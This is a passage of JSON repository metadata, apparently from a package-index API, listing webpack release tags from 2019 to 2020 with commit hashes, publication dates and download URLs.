ind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependenci